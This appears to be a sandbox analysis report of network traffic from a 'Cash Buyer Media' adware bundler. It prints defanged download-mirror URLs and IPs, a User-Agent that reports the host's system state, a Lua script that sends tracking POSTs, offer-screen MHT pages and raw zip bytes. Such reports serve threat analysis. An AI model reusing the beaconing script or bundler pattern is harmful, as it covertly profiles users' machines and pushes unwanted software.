hxxp://mirror.downloadnet1210.com/products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/skins/da/11122015/megazord_darkskin_nondlm_cancel.zip | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/binstallers/BM2/adknowledge/ipage/adknowledge_3.mht | 213.133.184.112 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht | 213.133.184.112 |
hxxp://mirror.downloadmanager145.com/binstallers/BM2/api/do_tracking_hit.lua | 213.133.184.113 |
hxxp://mirror.downloadnet1210.com/products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht | 213.133.184.112 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /binstallers/BM2/api/do_tracking_hit.lua HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadmanager145.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "9cc9c7aa05eddd412b09d5b37d446f81:1404848561"
Last-Modified: Tue, 08 Jul 2014 19:42:41 GMT
Accept-Ranges: bytes
Content-Length: 913
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
--[[.-- Lua Script to perform tracking hits IT can be run at start offer or finish and has aacces tot he variables.--]]..local http=require("wininet.http");.local json=require("json");..local main=function(). -- Need GuiInit. local guiinit=require("GuiInit");. local _Downloads=require("Downloads");. local target=current.file._a_.Options -- Get the options blob. -- No Target is specified then do nothing. if target == "" or not target then. return; -- Blank so do nothing . end. target=current.expand_path(target);. -- Get the command line and look for an option . --[[local cli=current.expand_path("$CMDLINE");. local opts=string.match(cli or "","--custom.p.tid=([^ ] )");. ]]. -- Make a reques to the target Url. local r,c,h = http.request{. method="POST",. url=target ,. proxy=_Downloads.proxyForUrl(target). }..end...return main();.HTTP/1.1 200 OK..Server: Apache..ETag: "9cc9c7aa05eddd412b09d5b37d446f81:1404848561"..Last-Modified: Tue, 08 Jul 2014 19:42:41 GMT..Accept-Ranges: bytes..Content-Length: 913..Content-Type: text/plain..Date: Tue, 15 Dec 2015 00:33:06 GMT..Connection: keep-alive..--[[.-- Lua Script to perform tracking hits IT can be run at start offer or finish and has aacces tot he variables.--]]..local http=require("wininet.http");.local json=require("json");..local main=function(). -- Need GuiInit. local guiinit=require("GuiInit");. local _Downloads=require("Downloads");. local target=current.file._a_.Options -- Get the
<<< skipped >>>
GET /skins/da/11122015/megazord_darkskin_nondlm_cancel.zip HTTP/1.1
Accept-Encoding: identify, enc(RC4/sha1:dc724af1), enc(RC4/sha1:eb7eb628), enc(RC4/sha1:66ed45ce), enc(RC4/sha1:39443636)
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "398d4b8eeb1f419a51f5c199a58139a2:1447358884"
Last-Modified: Thu, 12 Nov 2015 20:08:04 GMT
Accept-Ranges: bytes
Content-Length: 73310
Content-Type: application/zip
Date: Tue, 15 Dec 2015 00:33:05 GMT
Connection: keep-alive
PK........,nkG].\.............options.json].... .D.~......... .e..-4........t.o.&...=b.r.%s..Z..F0.....Qi.....t..Q...";..i..)..l{.E...v....O.F..s gsHK..P...of.v........}$G......:.;G.....PK.........`.Dj..m............assets/.DS_Store..1..0......M\:2v....!x./....{t%..i..j....oB..P..x..@..................f.t|?MD...>....k<...]...V.y......f...m^.Z........e...".............0..u.....'<.[7n......p..-le.W.."...PK........8d.D3.......%.......assets/accept.png.VwXSg......2d.....$.D.BB$@...A!$7.F.$.$ .Ph..V....`.2.Z.2..(.....".Td....._....?........9.y...7....[.4. ....5.^.g.^..r2i`..H...Z...@.P.....6..@.....=.dK......<..."ta..X.?.......@V...8.....P/.$.G......r.d.3..f.P.o.u..p.9....e..0s3...$3....P...O@..a..%.. .(..O../..WP...P....x.....`.........8...`Qh.C@`p$<..5.~j0.7>.C...>....0o.0..B.D".....O.0D"q.....i ....)F............. ..2gz.AB2..z......a..S.d)C...(.....G.j............e... >Kv......w...,..!>Wv)L?*....xB:.... .\6...YQ... .........[P.8#*.K....Wm...J..).cc.....X..X.pT,.m.AcM.F..X:O d.X.*...,._.$..`.A.#...V.aoP.....(.......c."....|...s..6...C../............@.2^97.K36..hh......a....'g(Y0..)..%Y...?..l..<.O.....Q#......t....{.........u....rHE.Q...J.l.w[$.X5N...3...G3>...)N.w7h.^...I.>.../Us2.}.l..........>R...B..fA|8.!^I....J....k.....oo.....1!M9.}.._|.,k.bj.&B.g...D.......g_....T.S3 .G.7.5...v..5...........n.&hy.u=1..h..K1...D...}.|.../.x....R.}..r..W..u53...x...(A.hy.s^..S..f....l.P...."......k.v............R^V....9...=..&../...o.w.p....t'=]96.G.!W...........;~.<@..". .-......*.6l
<<< skipped >>>
GET /binstallers/BM2/adknowledge/ipage/adknowledge_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "963e0ef21e87f2dd88b475f85634a747:1434231096"
Last-Modified: Sat, 13 Jun 2015 21:31:36 GMT
Accept-Ranges: bytes
Content-Length: 61500
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Product Name..Date: Mon, 20 Oct 2014 17:40:00 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEC8C.DF382910"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEC8C.DF382910..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\vitallia_primary_4.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">..<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" =.."hXXp://VVV.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><HTML><HEAD>..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>.. =20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. =20..<SCRIPT src=3D"file:///C:/offerscreen/OfferScreenParameters.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE =..data-bind=3D"text:$root.customParameters()['ProductName']">Product=20..Name</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=...container{width:628px; height:282px; padding:16px 0 0 0;}=0A=..h1 {color: #000000;font-family: "Helvetica =..Neue","Helvetica","Arial",sans-s
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_onesystemcare_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "668c51a87c703a436c83895218d6e534:1439558955"
Last-Modified: Fri, 14 Aug 2015 13:29:15 GMT
Accept-Ranges: bytes
Content-Length: 75945
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_pcacceleratepro_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "e9325ef10ed838c35b5af7775c9eae91:1444312504"
Last-Modified: Thu, 08 Oct 2015 13:55:04 GMT
Accept-Ranges: bytes
Content-Length: 76083
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_playthru_pcprocleaner_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "671db8939d3b2ae3d8a7433381dcd081:1438700315"
Last-Modified: Tue, 04 Aug 2015 14:58:35 GMT
Accept-Ranges: bytes
Content-Length: 76006
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/arcadetwist_knctr_playthru_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "2b71e9df8a1242ac5e8565c59fec2e5c:1438700315"
Last-Modified: Tue, 04 Aug 2015 14:58:35 GMT
Accept-Ranges: bytes
Content-Length: 76002
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_onesystemcare_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "0b20a9fd75b7da657a56c678953dfa53:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 75945
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_tidy_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "e987399a16f3a98f5ba2a3b883279a21:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 76105
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/knctr_playthru_tidy_triple_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "1ee70d370acae337db961198ce34abcf:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 75801
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Mon, 7 Apr 2014 14:26:55 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CF526D.6D799070"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CF526D.6D799070..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\highlightly_stormalerts_optimizerpro_triple_628.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COL
<<< skipped >>>
GET /products/BM2/combos/tidynetwork_playthru_propccleaner_updateadmin_628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "eaccef0167555b64ef5b014b80cd94f8:1438700316"
Last-Modified: Tue, 04 Aug 2015 14:58:36 GMT
Accept-Ranges: bytes
Content-Length: 75987
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Fri, 24 Oct 2014 11:42:51 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0000_01CFEF7F.A431DCD0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0000_01CFEF7F.A431DCD0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\storm_alerts_quad_1.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<SCRIPT src=3D"file:///C:/offerscreen/knockout-2.0.js" =..type=3D"text/javascript"></SCRIPT>..=20..<SCRIPT src=3D"file:///C:/offerscreen/AutoFeatureModel.js" =..type=3D"text/javascript"></SCRIPT>.. <TITLE>Search.com 628 by 282</TITLE>=20..<META http-equiv=3D"Content-Type" content=3D"text/html; =..charset=3Dutf-8">=20..<STYLE>=0A=..=0A=../* set the background color to match the offer. */=0A=..body {background-color:#e3e3e3;margin:0;padding:0;font-family: arial, =..verdana, sans serif;color:#222;position:relative;height: 282px;width: =..628px;}=0A=..table{background-repeat: no-repeat;}=0A=..h1 {font-size: 18px;font-weight: bold;margin-bottom: 4px;margin-top: 0;}=0A=..p {margin: 0;font-size: 12px}=0A=..td{vertical-align:top; }=0A=..a{COLOR:#0858a8; text-decoration
<<< skipped >>>
GET /products/BM2/combos/tidy_playthru_onesystemcare_triple_628_3.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "8a06da99b2dd4eae35a2d18f3903bdf1:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 75952
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
From: "Saved by Internet Explorer 11"..Subject: Search.com 628 by 282..Date: Thu, 11 Sep 2014 14:28:18 -0400..MIME-Version: 1.0..Content-Type: multipart/related;...type="text/html";...boundary="----=_NextPart_000_0007_01CFCDCC.A1C309D0"..X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17609..This is a multi-part message in MIME format...------=_NextPart_000_0007_01CFCDCC.A1C309D0..Content-Type: text/html;...charset="utf-8"..Content-Transfer-Encoding: quoted-printable..Content-Location: file://C:\offerscreen\tidy_rapidwatch_optimizerpro_triple_628_3.html..=EF=BB=BF<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML><HEAD><META content=3D"IE=3D5.0000" =..http-equiv=3D"X-UA-Compatible">..<TITLE>Search.com 628 by 282</TITLE>..<META content=3DIE=3D5.0000 http-equiv=3DX-UA-Compatible>..<SCRIPT type=3Dtext/javascript=20..src=3D"file:///C:/offerscreen/knockout-2.0.js"></SCRIPT>..<SCRIPT type=3Dtext/javascript=20..src=3D"file:///C:/offerscreen/AutoFeatureModel.js"></SCRIPT>..<META content=3D"text/html; charset=3Dutf-8" http-equiv=3DContent-Type>..<STYLE>BODY {...HEIGHT: 282px; FONT-FAMILY: arial, verdana, sans serif; WIDTH: 628px; =..POSITION: relative; COLOR: #222; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; =..PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: =..#e3e3e3..}..TABLE {...BACKGROUND-REPEAT: no-repeat..}..H1 {...MARGIN-BOTTOM: 4px; FONT-SIZE: 18px; FONT-WEIGHT: bold; MARGIN-TOP: 0px..}..P {...FO
<<< skipped >>>
GET /products/BM2/combos/onesystemcare_tidy_double628.mht HTTP/1.1
User-Agent: Cash Buyer Media(ref=[2e3206349b24896aeaa4f324d449362b51026712];windows=5.1;uac=false;ie=6.0.2900.5512;elevated=true;dotnet=nil;startTime=520217;pid=928)
Host: mirror.downloadnet1210.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "b2b2ba26d95808459c2f3b647fbec299:1439558956"
Last-Modified: Fri, 14 Aug 2015 13:29:16 GMT
Accept-Ranges: bytes
Content-Length: 72381
Content-Type: text/plain
Date: Tue, 15 Dec 2015 00:33:06 GMT
Connection: keep-alive
